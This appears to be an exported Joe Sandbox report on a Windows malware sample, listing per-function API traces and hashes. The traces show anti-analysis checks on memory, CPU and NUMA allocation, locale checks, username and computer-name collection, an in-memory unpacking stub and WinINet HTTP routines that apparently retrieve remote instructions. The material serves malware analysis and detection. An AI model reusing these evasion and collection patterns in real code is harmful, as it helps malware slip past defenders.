                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                      • API String ID: 2238633743-1775429166
                                      • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                      • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                      • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                      • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                      Control-flow Graph (legend: Executed / Not Executed; the graph itself is an image and is not reproduced here)
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                      • StrCmpCA.SHLWAPI(?,00882630), ref: 00406303
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                      • HttpOpenRequestA.WININET(00000000,GET,?,00881E28,00000000,00000000,00400100,00000000), ref: 00406385
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                      • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                      • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                      • InternetCloseHandle.WININET(00000000), ref: 00406503
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET
                                      • API String ID: 3074848878-2509457195
                                      • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                      • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                      • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                      • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                      Control-flow Graph (legend: Executed / Not Executed; the graph itself is an image and is not reproduced here)
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcessstrtok_s
                                      • String ID: block
                                      • API String ID: 3407564107-2199623458
                                      • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                      • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                      • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                      • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                      Control-flow Graph (legend: Executed / Not Executed; the graph itself is an image and is not reproduced here)
                                      APIs
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008786A0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                        • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                        • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                        • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                        • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                        • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                      • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleepstrtok
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3630751533-2791005934
                                      • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                      • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                      • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                      • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                      Control-flow Graph (legend: Executed / Not Executed; the graph itself is an image and is not reproduced here)
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                      • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                      • wsprintfA.USER32 ref: 00417640
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 3790021787-3809124531
                                      • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                      • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                      Control-flow Graph

                                      control_flow_graph (graph rendering not preserved in text export): function at 0230003C in the unpacked region; blocks call VirtualAlloc, VirtualProtect, VirtualFree and LoadLibraryA, with subcalls to 02300A3F, 02300E0F, 02300D90, 02300A69, 02300CCE and 02300CE7
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0230024D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: cess$kernel32.dll
                                      • API String ID: 4275171209-1230238691
                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                      • Instruction ID: 746ef3dcb69f921d4488a693262606992e45043278dd64e5b9135942425a71bd
                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                      • Instruction Fuzzy Hash: 80526B74A01229DFDB64CF58C994BACBBB5BF09304F1480D9E54DAB391DB30AA95CF24

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00878BE8), ref: 004198A1
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00878C90), ref: 004198BA
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00878C00), ref: 004198D2
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00878C18), ref: 004198EA
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00878C30), ref: 00419903
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008785A0), ref: 0041991B
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00873288), ref: 00419933
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00873228), ref: 0041994C
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00878C60), ref: 00419964
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00878C78), ref: 0041997C
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00879DD8), ref: 00419995
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00879FE8), ref: 004199AD
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00873008), ref: 004199C5
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00879EB0), ref: 004199DE
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                        • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                        • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                        • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                        • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                        • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                        • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                        • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                        • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                        • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                        • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                      • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                        • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                        • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                        • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                        • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                        • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                        • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                        • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008786A0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                      • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                      • Sleep.KERNEL32(00001770), ref: 00416B04
                                      • CloseHandle.KERNEL32(?,00000000,?,008786A0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                      • ExitProcess.KERNEL32 ref: 00416B22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 3511611419-0
                                      • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                      • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                      • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                      • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                      Control-flow Graph

                                      APIs
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                      • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??2@$CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1683549937-4251816714
                                      • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                      • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                      • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                      • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                      Control-flow Graph

                                      control_flow_graph (graph rendering not preserved in text export): function at 00401220; blocks call GlobalMemoryStatusEx and ExitProcess, with subcalls to 004189B0 and 0041DA00
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                      • __aulldiv.LIBCMT ref: 00401258
                                      • __aulldiv.LIBCMT ref: 00401266
                                      • ExitProcess.KERNEL32 ref: 00401294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                      • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                      • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                      • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                      Control-flow Graph

                                      control_flow_graph (graph rendering not preserved in text export): blocks 00416ABA-00416B22; they call OpenEventA, CreateEventA, CloseHandle, Sleep and ExitProcess, with subcalls to 0041AAD0, 00416920 and 00415B10
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008786A0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                      • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                      • Sleep.KERNEL32(00001770), ref: 00416B04
                                      • CloseHandle.KERNEL32(?,00000000,?,008786A0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                      • ExitProcess.KERNEL32 ref: 00416B22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                      • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                      • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                      • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                        • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00882630), ref: 00406303
                                        • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                        • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,00881E28,00000000,00000000,00400100,00000000), ref: 00406385
                                        • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                        • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                      • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                      • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                      • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocComputerNameProcess
                                      • String ID:
                                      • API String ID: 4203777966-0
                                      • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                      • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                      • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                      • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                      • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                      • ExitProcess.KERNEL32 ref: 00401143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                      • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                      • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
